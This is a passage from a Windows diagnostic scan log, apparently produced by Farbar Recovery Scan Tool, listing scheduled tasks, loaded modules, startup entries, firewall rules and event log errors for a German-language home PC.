Task: {F3A21A1D-F877-441E-81C3-E40095CD3422} - System32\Tasks\Sony Corporation\VAIO Care\VCSelfHeal => C:\Program Files\Sony\VAIO Care\VCSystemTray.exe [2014-12-03] (Sony Corporation)
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\update-S-1-5-21-2798130160-1945478871-1923780282-1001.job => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe
Task: C:\WINDOWS\Tasks\update-sys.job => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe

==================== Loaded Modules (Whitelisted) ==============

2015-04-03 12:38 - 2014-08-27 16:31 - 00265080 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\txmlutil.dll
2015-04-03 12:38 - 2013-09-03 14:29 - 00101328 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\bdmetrics.dll
2015-04-03 12:38 - 2015-02-12 22:53 - 00003072 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\UI\accessl.ui
2015-04-03 12:38 - 2012-10-29 14:22 - 00152816 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\bdfwcore.dll
2015-05-06 19:55 - 2015-05-06 19:55 - 00790368 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\otengines_00350_004\ashttpbr.mdl
2015-05-06 19:55 - 2015-05-06 19:55 - 00711064 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\otengines_00350_004\ashttpdsp.mdl
2015-05-06 19:55 - 2015-05-06 19:55 - 02683520 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\otengines_00350_004\ashttpph.mdl
2015-05-06 19:55 - 2015-05-06 19:55 - 01326504 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\otengines_00350_004\ashttprbl.mdl
2015-03-27 21:49 - 2015-03-30 09:02 - 00020240 _____ () C:\WINDOWS\system32\spool\PRTPROCS\x64\TeamViewer_PrintProcessor.dll
2015-02-13 05:20 - 2015-02-13 05:20 - 00085832 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2015-02-13 05:20 - 2015-02-13 05:20 - 01346344 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2015-03-27 21:39 - 2014-05-20 09:19 - 00105640 _____ () C:\Program Files\Microsoft Office 15\ClientX64\ApiClient.dll
2015-03-27 18:58 - 2015-05-12 05:30 - 00116368 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2013-11-28 23:35 - 2013-11-28 23:35 - 00011264 _____ () C:\Program Files (x86)\Bluetooth Suite\Modules\ActivateDesktopDebugger\ActivateDesktopDebugger.dll
2013-11-28 23:32 - 2013-11-28 23:32 - 00086016 _____ () C:\Program Files (x86)\Bluetooth Suite\Modules\Map\MAP.dll
2013-11-28 23:38 - 2013-11-28 23:38 - 00012928 _____ () C:\Program Files (x86)\Bluetooth Suite\ActivateDesktop.exe
2013-11-28 23:38 - 2013-11-28 23:38 - 00384128 _____ () C:\Program Files (x86)\Bluetooth Suite\ContactsApi.dll
2013-11-28 23:28 - 2013-11-28 23:28 - 00020992 _____ () C:\Program Files (x86)\Bluetooth Suite\L10n\de-DE\BtTray.de-DE.dll
2015-05-22 16:44 - 2015-05-22 16:44 - 00043480 _____ () C:\Program Files\FileZilla FTP Client\fzshellext_64.dll
2015-05-22 20:22 - 2015-04-15 21:41 - 01616384 _____ () C:\Program Files (x86)\MediaMonkey\MediaMonkey64Helper.exe
2015-03-13 15:54 - 2015-03-13 15:54 - 00057344 _____ () C:\Program Files\CCleaner\lang\lang-1031.dll
2015-03-27 22:51 - 2015-03-27 22:51 - 00039192 _____ () C:\Program Files\CCleaner\branding.dll
2014-01-01 18:13 - 2014-01-01 18:13 - 00245760 _____ () C:\Users\Ruben\Eigene Programme\uGet\bin\uget.exe
2015-05-09 11:31 - 2015-05-09 11:31 - 00052224 _____ () C:\Users\Ruben\.gradle\native\19\windows-amd64\native-platform.dll
2015-05-12 15:18 - 2015-05-12 15:18 - 00042496 _____ () C:\Program Files\IntelliJ\bin\IdeaWin64.dll
2015-05-12 15:18 - 2015-05-12 15:18 - 00050688 _____ () C:\Program Files\IntelliJ\bin\focuskiller64.dll
2015-05-12 15:18 - 2015-05-12 15:18 - 00061952 _____ () C:\Program Files\IntelliJ\bin\jumplistbridge64.dll
2015-05-12 15:17 - 2015-05-12 15:17 - 00216064 _____ () C:\Program Files\IntelliJ\lib\libpty\win\x86_64\libwinpty.dll
2015-05-12 15:17 - 2015-05-12 15:17 - 00201728 _____ () C:\Program Files\IntelliJ\lib\libpty\win\x86_64\winpty-agent.exe
2015-05-04 19:29 - 2014-11-25 19:09 - 00741888 _____ () C:\Program Files\HexChat\hexchat.exe
2015-05-04 19:29 - 2014-11-22 19:50 - 01394688 _____ () C:\Program Files\HexChat\cairo.dll
2015-05-04 19:29 - 2014-11-22 19:48 - 00076288 _____ () C:\Program Files\HexChat\zlib1.dll
2015-05-04 19:29 - 2014-11-22 19:48 - 00225280 _____ () C:\Program Files\HexChat\libpng16.dll
2015-05-04 19:29 - 2014-11-22 19:48 - 00682496 _____ () C:\Program Files\HexChat\fontconfig.dll
2015-05-04 19:29 - 2014-11-22 19:48 - 00028160 _____ () C:\Program Files\HexChat\iconv.dll
2015-05-04 19:29 - 2014-11-22 19:49 - 00613888 _____ () C:\Program Files\HexChat\pixman-1.dll
2015-05-04 19:29 - 2014-11-22 19:48 - 01502720 _____ () C:\Program Files\HexChat\libxml2.dll
2015-05-04 19:29 - 2014-11-22 19:50 - 00783360 _____ () C:\Program Files\HexChat\harfbuzz.dll
2015-05-04 19:29 - 2014-11-22 19:51 - 00056832 _____ () C:\Program Files\HexChat\lib\gtk-2.0\i686-pc-vs10\engines\libwimp.dll
2015-05-04 19:29 - 2014-11-22 19:50 - 00287744 _____ () C:\Program Files\HexChat\lib\enchant\libenchant_myspell.dll
2015-05-04 19:29 - 2014-11-25 19:09 - 00011264 _____ () C:\Program Files\HexChat\plugins\hcupd.dll
2012-10-08 12:41 - 2012-07-31 04:11 - 01198912 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\ACE.dll
2015-05-23 15:54 - 2015-05-20 19:03 - 00622880 _____ () C:\Program Files (x86)\IObit\LiveUpdate\ProductStatistics.dll
2015-05-23 15:53 - 2015-05-20 19:03 - 00348960 _____ () C:\Program Files (x86)\IObit\Start Menu 8\madExcept_.bpl
2015-05-23 15:53 - 2015-05-20 19:03 - 00183584 _____ () C:\Program Files (x86)\IObit\Start Menu 8\madBasic_.bpl
2015-05-23 15:53 - 2015-05-20 19:03 - 00050976 _____ () C:\Program Files (x86)\IObit\Start Menu 8\madDisAsm_.bpl
2015-05-23 15:54 - 2015-05-20 19:04 - 00268920 _____ () C:\Program Files (x86)\IObit\Start Menu 8\sqlite3.dll
2015-05-23 15:54 - 2015-05-20 19:03 - 00053024 _____ () C:\Program Files (x86)\IObit\Start Menu 8\parseAuto.dll
2015-05-23 15:54 - 2015-05-20 19:03 - 00622880 _____ () C:\Program Files (x86)\IObit\Start Menu 8\ProductStatistics.dll
2015-03-30 19:56 - 2015-05-08 02:36 - 00011920 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2015-05-23 15:54 - 2015-05-20 19:04 - 00041248 _____ () C:\Program Files (x86)\IObit\Start Menu 8\winkey.dll
2015-05-22 20:22 - 2015-04-24 01:56 - 00581632 _____ () C:\Program Files (x86)\MediaMonkey\sqlite3MM.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00054784 _____ () C:\Program Files (x86)\MediaMonkey\MMHelper.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00390656 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\f_aac.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00327680 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\f_ape.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00306688 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\f_AVI.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00132608 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\f_flac.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00267264 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\f_flac_codec.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00262656 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\f_FLV.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00376832 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\f_mkv.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00395264 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\f_MP4.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00328192 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\f_mpc.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00269824 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\f_MPG.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00352768 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\f_ogg.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00141824 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\f_video.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00335360 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\f_wave.dll
2015-05-22 20:22 - 2015-04-24 01:56 - 00374272 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\f_WMV.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00061440 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\in_mfaudio.dll
2015-05-22 20:22 - 2010-06-17 16:13 - 00077824 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\in_mpc.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00321024 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\in_vorbis.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00081408 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\in_wav.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00222720 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\in_wma.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00103936 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\in_wmp3.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00348672 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\out_MMDS.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00873984 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\out_WASAPI.dll
2015-05-22 20:22 - 2012-11-09 21:18 - 00013824 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\out_wave.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00103936 _____ () C:\Program Files (x86)\MediaMonkey\Equalize.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 01055232 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\d_iPhone.dll
2015-05-22 20:22 - 2015-04-24 01:56 - 01176064 _____ () C:\Program Files (x86)\MediaMonkey\iPhoneCalc.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00900608 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\d_iPod.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00400384 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\d_iRiverH.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00422912 _____ () C:\Program Files (x86)\MediaMonkey\Plugins\d_WMDM.dll
2015-05-22 20:22 - 2015-04-24 02:02 - 00132608 _____ () C:\Program Files (x86)\MediaMonkey\WMAuth.dll
2012-03-19 06:07 - 2012-03-19 06:07 - 00647675 _____ () C:\Users\Ruben\Eigene Programme\uGet\bin\libcairo-2.dll
2010-03-31 04:29 - 2010-03-31 04:29 - 00279955 _____ () C:\Users\Ruben\Eigene Programme\uGet\bin\libidn-11.dll
2013-06-23 01:23 - 2013-06-23 01:23 - 00113166 _____ () C:\Users\Ruben\Eigene Programme\uGet\bin\zlib1.dll
2012-03-18 23:00 - 2012-03-18 23:00 - 00576478 _____ () C:\Users\Ruben\Eigene Programme\uGet\bin\libpixman-1-0.dll
2012-10-07 21:40 - 2012-10-07 21:40 - 00177161 _____ () C:\Users\Ruben\Eigene Programme\uGet\bin\libpng15-15.dll
2012-03-19 06:07 - 2012-03-19 06:07 - 00052730 _____ () C:\Users\Ruben\Eigene Programme\uGet\bin\libcairo-gobject-2.dll
2012-05-12 20:49 - 2012-05-12 20:49 - 00051537 _____ () C:\Users\Ruben\Eigene Programme\uGet\bin\libffi-6.dll
2012-03-18 23:00 - 2012-03-18 23:00 - 00052188 _____ () C:\Users\Ruben\Eigene Programme\uGet\bin\ICONV.DLL
2012-03-19 02:01 - 2012-03-19 02:01 - 00226231 _____ () C:\Users\Ruben\Eigene Programme\uGet\bin\libfontconfig-1.dll
2012-03-19 00:43 - 2012-03-19 00:43 - 00549926 _____ () C:\Users\Ruben\Eigene Programme\uGet\bin\libfreetype-6.dll
2012-07-21 23:46 - 2012-07-21 23:46 - 00176311 _____ () C:\Users\Ruben\Eigene Programme\uGet\bin\libexpat-1.dll
2012-03-31 05:31 - 2012-03-31 05:31 - 00050032 _____ () C:\Users\Ruben\Eigene Programme\uGet\lib\pango\1.6.0\modules\pango-basic-win32.dll
2013-11-19 11:21 - 2013-11-19 11:21 - 00347136 _____ () C:\Program Files\Sony\VAIO Care\Iolo\vosges.dll
2015-03-27 21:52 - 2015-03-27 21:52 - 01020928 _____ () C:\Users\Ruben\AppData\Roaming\Mozilla\Firefox\Profiles\i1zvapai.default\extensions\support@lastpass.com\platform\WINNT_x86-msvc\components\lpxpcom.dll
2015-03-27 21:39 - 2015-03-27 21:39 - 00316576 _____ () C:\Program Files\Microsoft Office 15\root\office15\AppVIsvStream32.dll
2015-04-03 12:38 - 2014-08-27 16:30 - 00204280 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\antispam32\txmlutil.dll
2015-04-03 12:38 - 2013-09-03 14:29 - 00095088 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\antispam32\bdmetrics.dll
2015-05-02 11:28 - 2015-05-02 11:28 - 01754296 _____ () C:\Program Files\Microsoft Office 15\Root\Office15\tmpod.dll
2015-05-19 19:29 - 2015-04-14 14:42 - 01032360 _____ () C:\Program Files\Microsoft Office 15\Root\Office15\ADDINS\UmOutlookAddin.dll

==================== Safe Mode (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\str => ""="service"

==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-2798130160-1945478871-1923780282-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Ruben\Pictures\Wallpaper2.jpg
DNS Servers: 192.168.2.1

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

HKLM\...\StartupApproved\Run: => "iTunesHelper"
HKLM\...\StartupApproved\Run: => "Bdagent"
HKLM\...\StartupApproved\Run32: => "APSDaemon"
HKLM\...\StartupApproved\Run32: => "QuickTime Task"
HKLM\...\StartupApproved\Run32: => "Andy"
HKLM\...\StartupApproved\Run32: => "Wondershare Helper Compact.exe"
HKU\S-1-5-21-2798130160-1945478871-1923780282-1001\...\StartupApproved\StartupFolder: => "Curse.lnk"
HKU\S-1-5-21-2798130160-1945478871-1923780282-1001\...\StartupApproved\Run: => "Bitdefender-Geldbörse-Agent"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{DD925A9E-B4C1-4B8E-849F-F5B2D1E3750C}] => (Allow) C:\Program Files\Sony\VAIO Care\VAIOShell.exe
FirewallRules: [{CEAEEEB0-3B7A-4FD2-BD86-5F9D4E5B7181}] => (Allow) C:\Program Files\Sony\VAIO Care\VCSystemTray.exe
FirewallRules: [{8C88C867-50B5-49FA-B27A-A6501E573C53}] => (Allow) C:\Program Files\Sony\VAIO Care\VCAdmin.exe
FirewallRules: [{81A94CB6-BD07-4B41-86F1-56F62D54A30C}] => (Allow) C:\Program Files\Sony\VAIO Care\VCAgent.exe
FirewallRules: [{F0BD25BE-3DA4-45B0-BDC7-A9509356E3FA}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{1948BECA-120F-4B78-BFDC-8E058F0DEFA9}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{1DE862D0-EFB3-43CF-BCA0-DD391A80129B}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{D6477072-192A-4655-8CFE-3A8B772F2BCC}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\outlook.exe
FirewallRules: [{91F6ED8B-B20A-4F6D-8911-A62AA0F81795}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\Lync.exe
FirewallRules: [{25D666CF-F9A5-4DB3-9C5A-C6C2205B148B}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\UcMapi.exe
FirewallRules: [{461BC6C2-A82E-4B0F-BAF9-8D3DC7865ED1}] => (Allow) C:\Users\Ruben\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [{A719AE01-014A-48EF-B352-C6B3745318EA}] => (Allow) C:\Users\Ruben\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [{882E18AB-1C26-4C7E-9ED6-3AEADE82DB1F}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{5A618EA3-6C07-4A3B-991A-5573F557885D}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{66882F61-384B-439A-A65E-C22FD1685276}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{073CE425-0219-4249-849D-A37470DD5C03}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{7FB503F9-4CAA-4A6E-A481-44D4FCFC18CF}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{A927EFF4-FC35-44BA-A26E-97542BBDF127}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{C656BED8-B935-4238-A470-3CE7DC989E1B}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{2F2BBB2B-9020-44C3-BF2E-BEEE4BDD0CB0}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{A33DFD9A-D7C1-499F-99DD-4EDA3A14A28C}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{449C037F-3ADF-44F5-AC08-6204EF4F9C1E}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{32BB99B2-9080-4673-9094-08EFD0027CBB}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [TCP Query User{64D20F49-A8E7-43F0-A7BA-6E2E7F3C4A8E}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [UDP Query User{F9417769-B14A-4FA9-858C-F3FC27AD174B}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [{BE539453-E7B6-4C8A-96B2-D9CEF1939CC4}] => (Allow) C:\Users\Ruben\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{1AFE48EC-9617-427D-A894-712AA60852D1}] => (Allow) C:\Users\Ruben\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [TCP Query User{4D648023-286B-455E-8802-3EF66754A5C8}C:\users\ruben\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\ruben\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [UDP Query User{53D3AD5D-3EF1-4BFE-913A-E6513F3EBE35}C:\users\ruben\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\ruben\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [TCP Query User{5F0DDEB8-1185-42B5-BE14-DB7B6C36F430}C:\users\ruben\eigene programme\eclipse\eclipse.exe] => (Allow) C:\users\ruben\eigene programme\eclipse\eclipse.exe
FirewallRules: [UDP Query User{A6CAAD5D-EC45-40D3-A2EA-DF5A78B948F0}C:\users\ruben\eigene programme\eclipse\eclipse.exe] => (Allow) C:\users\ruben\eigene programme\eclipse\eclipse.exe
FirewallRules: [TCP Query User{00387E7A-07D1-452B-ABF3-A52B1BD91493}C:\users\ruben\eigene programme\cursemc\minecraft\install\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\ruben\eigene programme\cursemc\minecraft\install\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [UDP Query User{65CB58F6-9D10-409F-9809-1882C7350A0F}C:\users\ruben\eigene programme\cursemc\minecraft\install\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\users\ruben\eigene programme\cursemc\minecraft\install\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [{001AF3C6-80DB-46A6-8439-38596A680337}] => (Block) C:\users\ruben\eigene programme\cursemc\minecraft\install\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [{345109F8-8A06-4336-9505-79E484E02DCF}] => (Block) C:\users\ruben\eigene programme\cursemc\minecraft\install\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [{0CBE8861-599D-4DA0-9185-FC4397925669}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{01607C1B-7BB7-4575-99B3-66A696D4356F}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{2DDE0A59-314B-46D0-B276-FB4EF9BB65F3}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{3F02CA08-7D82-4B60-AF8E-2B1ED2D4AB52}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{3EBF5AF8-DCB8-4875-8E7F-8FE480E061EB}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\Lync.exe
FirewallRules: [{0A800CDA-F59C-4D51-912E-A144C5416E79}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\UcMapi.exe
FirewallRules: [{C6DFD0C4-FED3-4DB5-816B-E0BDBFDB3C54}] => (Allow) C:\Users\Ruben\AppData\Local\Microsoft\OneDrive\OneDrive.exe
FirewallRules: [TCP Query User{04FB0F18-9435-4AF2-BEF8-5CDC3F531123}C:\program files\intellij\bin\idea64.exe] => (Allow) C:\program files\intellij\bin\idea64.exe
FirewallRules: [UDP Query User{313B7718-9F27-4709-848B-8F9241C27477}C:\program files\intellij\bin\idea64.exe] => (Allow) C:\program files\intellij\bin\idea64.exe
FirewallRules: [TCP Query User{CF98FF0B-930A-44F5-8E10-44232E22396C}C:\xampp\filezillaftp\filezillaserver.exe] => (Allow) C:\xampp\filezillaftp\filezillaserver.exe
FirewallRules: [UDP Query User{11E89715-1686-47B7-9236-870765CCB77B}C:\xampp\filezillaftp\filezillaserver.exe] => (Allow) C:\xampp\filezillaftp\filezillaserver.exe
FirewallRules: [TCP Query User{7E2CE727-F46F-4C38-BF8A-7B8BB7DCAB9E}C:\program files\hexchat\hexchat.exe] => (Allow) C:\program files\hexchat\hexchat.exe
FirewallRules: [UDP Query User{393154D5-4F67-4AA3-9B6E-CE2C1B3FB2A8}C:\program files\hexchat\hexchat.exe] => (Allow) C:\program files\hexchat\hexchat.exe
FirewallRules: [TCP Query User{DFCB56DB-ADB1-4A5A-8275-43DF16AC4AD2}C:\program files\intellij\bin\idea.exe] => (Allow) C:\program files\intellij\bin\idea.exe
FirewallRules: [UDP Query User{9AC65511-E2B4-42B6-8BC5-C195BC5D2320}C:\program files\intellij\bin\idea.exe] => (Allow) C:\program files\intellij\bin\idea.exe
FirewallRules: [TCP Query User{AD192AF7-7090-4802-9D2F-19FEA3D04563}C:\program files\intellij\jre\jre\bin\java.exe] => (Allow) C:\program files\intellij\jre\jre\bin\java.exe
FirewallRules: [UDP Query User{FA5B7958-9A79-4EA1-8B95-47AEC9B7BB67}C:\program files\intellij\jre\jre\bin\java.exe] => (Allow) C:\program files\intellij\jre\jre\bin\java.exe
FirewallRules: [TCP Query User{78DC35BA-63BE-45A4-9B28-436D7106EEBF}C:\users\ruben\eigene programme\ts3-server\ts3server_win64.exe] => (Allow) C:\users\ruben\eigene programme\ts3-server\ts3server_win64.exe
FirewallRules: [UDP Query User{493F144E-1701-4D71-B6A1-671F268224EA}C:\users\ruben\eigene programme\ts3-server\ts3server_win64.exe] => (Allow) C:\users\ruben\eigene programme\ts3-server\ts3server_win64.exe
FirewallRules: [TCP Query User{3CD04B14-348E-4AAF-8440-84D39EF96E80}C:\program files\java\jdk1.8.0_45\jre\bin\java.exe] => (Allow) C:\program files\java\jdk1.8.0_45\jre\bin\java.exe
FirewallRules: [UDP Query User{8F1DA501-91DF-4E9B-9C13-0DF33CE5F045}C:\program files\java\jdk1.8.0_45\jre\bin\java.exe] => (Allow) C:\program files\java\jdk1.8.0_45\jre\bin\java.exe
FirewallRules: [TCP Query User{E4D2DEF3-A8E9-4B0B-AC04-856DC6DF5CBB}C:\program files\java\jdk1.8.0_45\bin\java.exe] => (Allow) C:\program files\java\jdk1.8.0_45\bin\java.exe
FirewallRules: [UDP Query User{34DB8E10-71D6-4EBA-9628-44DA321B42CB}C:\program files\java\jdk1.8.0_45\bin\java.exe] => (Allow) C:\program files\java\jdk1.8.0_45\bin\java.exe
FirewallRules: [TCP Query User{6328F78B-3A57-48B4-9146-35217F903A7B}C:\program files (x86)\mediamonkey\mediamonkey (non-skinned).exe] => (Allow) C:\program files (x86)\mediamonkey\mediamonkey (non-skinned).exe
FirewallRules: [UDP Query User{273EABDD-F8CE-48F9-8C9C-D9557C806EB3}C:\program files (x86)\mediamonkey\mediamonkey (non-skinned).exe] => (Allow) C:\program files (x86)\mediamonkey\mediamonkey (non-skinned).exe
FirewallRules: [TCP Query User{A404130A-0425-4132-848C-899EC2569128}C:\program files (x86)\jitsi\jitsi.exe] => (Allow) C:\program files (x86)\jitsi\jitsi.exe
FirewallRules: [UDP Query User{3BDC952C-FE10-4DD7-A82D-83A96D69BA28}C:\program files (x86)\jitsi\jitsi.exe] => (Allow) C:\program files (x86)\jitsi\jitsi.exe
FirewallRules: [TCP Query User{4A3810D0-C1ED-4BFE-824B-3FED2CBBFF87}C:\program files (x86)\counterpath\x-lite\x-lite.exe] => (Allow) C:\program files (x86)\counterpath\x-lite\x-lite.exe
FirewallRules: [UDP Query User{88923A50-6B3E-4CE2-9D9A-3AA81015E839}C:\program files (x86)\counterpath\x-lite\x-lite.exe] => (Allow) C:\program files (x86)\counterpath\x-lite\x-lite.exe
FirewallRules: [{5A7E5589-C90F-45DC-A878-963032A93E22}] => (Block) %ProgramFiles% (x86)\DisplayFusion\DisplayFusion.exe
FirewallRules: [{14F8B720-E677-41E6-916F-B8204F48679E}] => (Block) %ProgramFiles% (x86)\DisplayFusion\DisplayFusionCommand.exe
FirewallRules: [{3E3167E1-AEF9-4A76-ADF0-736B4EDC6A30}] => (Block) %ProgramFiles% (x86)\DisplayFusion\DisplayFusionHelperWin8.exe
FirewallRules: [{DE6AC810-9699-4CF0-857A-82CEF3E5D2ED}] => (Block) %ProgramFiles% (x86)\DisplayFusion\DisplayFusionService.exe
FirewallRules: [{F7794D9B-2754-4396-B659-7F60A34C50CC}] => (Block) %ProgramFiles% (x86)\DisplayFusion\DisplayFusionSettings.exe
FirewallRules: [TCP Query User{D0FBC95D-7272-4FB2-81EF-D12404986665}C:\program files (x86)\mediamonkey\mediamonkey.exe] => (Allow) C:\program files (x86)\mediamonkey\mediamonkey.exe
FirewallRules: [UDP Query User{D2920D89-E343-4747-89D5-994450412161}C:\program files (x86)\mediamonkey\mediamonkey.exe] => (Allow) C:\program files (x86)\mediamonkey\mediamonkey.exe
FirewallRules: [TCP Query User{ED855DBA-BA50-4583-97F1-C642301F43D8}C:\program files (x86)\jetbrains\phpstorm 8.0.3\bin\phpstorm.exe] => (Allow) C:\program files (x86)\jetbrains\phpstorm 8.0.3\bin\phpstorm.exe
FirewallRules: [UDP Query User{535BE06A-670C-41CB-BB85-FA3DAD9D358C}C:\program files (x86)\jetbrains\phpstorm 8.0.3\bin\phpstorm.exe] => (Allow) C:\program files (x86)\jetbrains\phpstorm 8.0.3\bin\phpstorm.exe

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (05/27/2015 08:15:21 AM) (Source: Windows Search Service) (EventID: 1019) (User: )
Description: Die Liste der eingeschlossenen und ausgeschlossenen Adressen konnte vvon Windows Search nicht verarbeitet werden. Fehler: <30, 0x80040d07, "iehistory://{S-1-5-21-2798130160-1945478871-1923780282-1001}/">.

Error: (05/27/2015 08:11:53 AM) (Source: Application Hang) (EventID: 1002) (User: )
